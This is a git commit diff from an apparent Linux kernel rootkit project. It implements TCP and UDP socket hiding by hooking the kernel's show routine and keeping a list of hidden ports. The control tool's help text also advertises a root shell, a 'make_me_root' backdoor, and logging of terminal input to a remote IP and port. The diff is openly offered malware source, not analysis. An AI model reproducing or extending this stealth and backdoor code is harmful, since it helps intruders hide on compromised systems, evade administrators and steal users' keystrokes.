commit e7ca2836e27e50b88835eb8b54b46e2890735c41
parent 5520c73abf9e251b66a4dfd133a6976f2e3958fe
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Sun, 13 Dec 2020 01:19:58 +0100
Add necessary calls for sockhide
Diffstat:
2 files changed, 16 insertions(+), 11 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -15,6 +15,7 @@
#include "inputlog.h"
#include "ioctl.h"
#include "rootkit.h"
+#include "sockhide.h"
#define BUFLEN 512
@@ -185,20 +186,22 @@ handle_tcphide(unsigned long arg)
long sarg = (long)arg;
if (!sarg) {
- // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+ // TODO also remove all sockets (tcp & udp) that are currently being hidden
rootkit.hiding_sockets = 0;
+ unhook_show();
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
- // TODO unhide tcp socket for port `-sarg`
+ remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp4);
+ remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp6);
DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- // TODO toggle hiding back on
+ hook_show();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
- // TODO hide tcp socket for port `sarg`
- rootkit.hiding_sockets = 1;
+ add_port_to_list(&hidden_ports, (port_t)sarg, tcp4);
+ add_port_to_list(&hidden_ports, (port_t)sarg, tcp6);
DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
}
@@ -211,20 +214,20 @@ handle_udphide(unsigned long arg)
long sarg = (long)arg;
if (!sarg) {
- // TODO toggle hiding off, perhaps also remove all sockets (tcp & udp) that are currently being hidden
+ unhook_show();
rootkit.hiding_sockets = 0;
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
- // TODO unhide udp socket for port `-sarg`
+ remove_port_from_list(&hidden_ports, (port_t)-sarg, udp4);
+ remove_port_from_list(&hidden_ports, (port_t)-sarg, udp6);
DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- // TODO toggle hiding back on
+ hook_show();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
-
- // TODO hide udp socket for port `sarg`
- rootkit.hiding_sockets = 1;
+ add_port_to_list(&hidden_ports, (port_t)sarg, udp4);
+ add_port_to_list(&hidden_ports, (port_t)sarg, udp6);
DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
}
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -267,6 +267,8 @@ help()
printf("%-38s %s\n", "shell", "obtain a shell as root");
printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
+ printf("%-38s %s\n", "socket hide <tcp|udp> <port>", "hide a tcp or udp with the given port");
+ printf("%-38s %s\n", "socket unhide <tcp|udp> <port>", "unhide a tcp or udp with the given port");
printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
printf("%-38s %s\n", "inputlogging-off", "disable input logging");
}
